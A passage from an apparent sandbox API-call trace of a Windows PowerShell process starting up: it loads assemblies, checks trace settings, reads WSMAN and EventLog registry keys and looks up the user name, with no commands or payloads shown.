lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.668] GetLastError () returned 0x57 [0029.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.669] GetLastError () returned 0x57 [0029.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24e380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0029.670] GetLastError () returned 0x57 [0029.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24e380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0029.670] GetLastError () returned 0x57 [0029.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0029.671] GetLastError () returned 0x57 [0029.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0029.671] GetLastError () returned 0x57 [0029.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24e380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0029.672] GetLastError () returned 0x57 [0029.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24e380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0029.672] GetLastError () returned 0x57 [0029.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24e380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0029.673] GetLastError () returned 0x57 [0029.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24e380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0029.673] GetLastError () returned 0x57 [0029.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.678] GetLastError () returned 0xcb [0029.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.678] GetLastError () returned 0xcb [0029.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.679] GetLastError () returned 0xcb [0029.680] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.680] GetLastError () returned 0xcb [0029.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.682] GetLastError () returned 0xcb [0029.683] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.683] GetLastError () returned 0xcb [0029.684] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.684] GetLastError () returned 0xcb [0029.690] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e72c | out: phkResult=0x24e72c*=0x300) returned 0x0 [0029.691] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24e77c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e780, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24e77c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e780*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.692] RegEnumValueW (in: hKey=0x300, dwIndex=0x0, lpValueName=0xd2630, lpcchValueName=0x24e7a4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24e7a4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0029.693] RegEnumValueW (in: hKey=0x300, dwIndex=0x1, lpValueName=0xd2630, lpcchValueName=0x24e7a4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24e7a4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0029.693] RegEnumValueW (in: hKey=0x300, dwIndex=0x2, lpValueName=0xd2630, lpcchValueName=0x24e7a4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x24e7a4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0029.693] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24e784, lpData=0x0, lpcbData=0x24e780*=0x0 | out: lpType=0x24e784*=0x1, lpData=0x0, lpcbData=0x24e780*=0x8) returned 0x0 [0029.693] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24e784, lpData=0xd2630, lpcbData=0x24e780*=0x8 | out: lpType=0x24e784*=0x1, lpData="2.0", lpcbData=0x24e780*=0x8) returned 0x0 [0029.740] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6e8 | out: phkResult=0x24e6e8*=0x304) returned 0x0 [0029.740] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24e738, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e73c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24e738*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e73c*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.740] RegEnumValueW (in: hKey=0x304, dwIndex=0x0, lpValueName=0xd2630, lpcchValueName=0x24e760, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24e760, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0029.740] RegEnumValueW (in: hKey=0x304, dwIndex=0x1, lpValueName=0xd2630, lpcchValueName=0x24e760, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24e760, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0029.740] RegEnumValueW (in: hKey=0x304, dwIndex=0x2, lpValueName=0xd2630, lpcchValueName=0x24e760, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x24e760, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0029.740] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24e740, lpData=0x0, lpcbData=0x24e73c*=0x0 | out: lpType=0x24e740*=0x1, lpData=0x0, lpcbData=0x24e73c*=0x8) returned 0x0 [0029.740] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24e740, lpData=0xd2630, lpcbData=0x24e73c*=0x8 | out: lpType=0x24e740*=0x1, lpData="2.0", lpcbData=0x24e73c*=0x8) returned 0x0 [0029.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.741] GetLastError () returned 0xcb [0029.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.742] GetLastError () returned 0xcb [0029.745] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6a8 | out: phkResult=0x24e6a8*=0x308) returned 0x0 [0029.746] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24e710, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e70c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24e710*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e70c*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.746] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x0, lpName=0xd2630, lpcchName=0x24e72c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24e72c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.746] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x1, lpName=0xd2630, lpcchName=0x24e72c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24e72c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.746] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x2, lpName=0xd2630, lpcchName=0x24e72c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24e72c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.746] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x3, lpName=0xd2630, lpcchName=0x24e72c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24e72c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.746] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x4, lpName=0xd2630, lpcchName=0x24e72c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24e72c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.747] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x5, lpName=0xd2630, lpcchName=0x24e72c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24e72c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.747] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x6, lpName=0xd2630, lpcchName=0x24e72c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24e72c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.747] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x7, lpName=0xd2630, lpcchName=0x24e72c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24e72c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.747] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x8, lpName=0xd2630, lpcchName=0x24e72c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24e72c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.747] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6d8 | out: phkResult=0x24e6d8*=0x324) returned 0x0 [0029.747] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6d8 | out: phkResult=0x24e6d8*=0x0) returned 0x2 [0029.747] RegOpenKeyExW (in: hKey=0x308, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6d8 | out: phkResult=0x24e6d8*=0x334) returned 0x0 [0029.747] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6d8 | out: phkResult=0x24e6d8*=0x0) returned 0x2 [0029.747] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6d8 | out: phkResult=0x24e6d8*=0x338) returned 0x0 [0029.747] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6d8 | out: phkResult=0x24e6d8*=0x0) returned 0x2 [0029.748] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6d8 | out: phkResult=0x24e6d8*=0x33c) returned 0x0 [0029.748] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6d8 | out: phkResult=0x24e6d8*=0x0) returned 0x2 [0029.748] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6d8 | out: phkResult=0x24e6d8*=0x340) returned 0x0 [0029.748] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6d8 | out: phkResult=0x24e6d8*=0x0) returned 0x2 [0029.748] RegOpenKeyExW (in: hKey=0x308, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6d8 | out: phkResult=0x24e6d8*=0x344) returned 0x0 [0029.748] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6d8 | out: phkResult=0x24e6d8*=0x0) returned 0x2 [0029.748] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6d8 | out: phkResult=0x24e6d8*=0x0) returned 0x5 [0029.765] RegOpenKeyExW (in: hKey=0x308, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6d8 | out: phkResult=0x24e6d8*=0x348) returned 0x0 [0029.765] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6d8 | out: phkResult=0x24e6d8*=0x0) returned 0x2 [0029.765] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6d8 | out: phkResult=0x24e6d8*=0x34c) returned 0x0 [0029.765] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6d8 | out: phkResult=0x24e6d8*=0x350) returned 0x0 [0029.765] RegCloseKey (hKey=0x350) returned 0x0 [0029.765] RegCloseKey (hKey=0x308) returned 0x0 [0029.765] RegCloseKey (hKey=0x34c) returned 0x0 [0029.773] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xb5c60, nSize=0x24e824 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x24e824) returned 0x1 [0029.774] GetLastError () returned 0x3 [0029.774] GetUserNameW (in: lpBuffer=0xd2630, pcbBuffer=0x24e82c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x24e82c) returned 1 [0029.811] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e68c | out: phkResult=0x24e68c*=0x354) returned 0x0 [0029.811] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24e6f4, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e6f0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24e6f4*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e6f0*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.811] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0xd2630, lpcchName=0x24e710, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24e710, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.811] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0xd2630, lpcchName=0x24e710, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24e710, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.812] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0xd2630, lpcchName=0x24e710, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24e710, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.812] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0xd2630, lpcchName=0x24e710, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24e710, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.812] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0xd2630, lpcchName=0x24e710, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24e710, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.812] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0xd2630, lpcchName=0x24e710, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24e710, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.812] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0xd2630, lpcchName=0x24e710, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24e710, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.812] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0xd2630, lpcchName=0x24e710, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24e710, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.812] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x8, lpName=0xd2630, lpcchName=0x24e710, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24e710, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.812] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x358) returned 0x0 [0029.812] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x0) returned 0x2 [0029.813] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x35c) returned 0x0 [0029.813] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x0) returned 0x2 [0029.813] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x360) returned 0x0 [0029.813] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x0) returned 0x2 [0029.813] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x364) returned 0x0 [0029.813] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x0) returned 0x2 [0029.813] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x368) returned 0x0 [0029.813] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x0) returned 0x2 [0029.813] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x36c) returned 0x0 [0029.813] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x0) returned 0x2 [0029.813] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x0) returned 0x5 [0029.815] RegOpenKeyExW (in: hKey=0x354, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x370) returned 0x0 [0029.815] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x0) returned 0x2 [0029.816] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x374) returned 0x0 [0029.816] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x378) returned 0x0 [0029.816] RegCloseKey (hKey=0x378) returned 0x0 [0029.816] RegCloseKey (hKey=0x354) returned 0x0 [0029.816] RegCloseKey (hKey=0x374) returned 0x0 [0029.816] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e68c | out: phkResult=0x24e68c*=0x374) returned 0x0 [0029.816] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24e6f4, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e6f0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24e6f4*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e6f0*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.816] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x0, lpName=0xd2630, lpcchName=0x24e710, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24e710, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.816] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x1, lpName=0xd2630, lpcchName=0x24e710, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24e710, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.816] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x2, lpName=0xd2630, lpcchName=0x24e710, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24e710, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.817] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x3, lpName=0xd2630, lpcchName=0x24e710, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24e710, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.817] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x4, lpName=0xd2630, lpcchName=0x24e710, lpReserved=0x0, 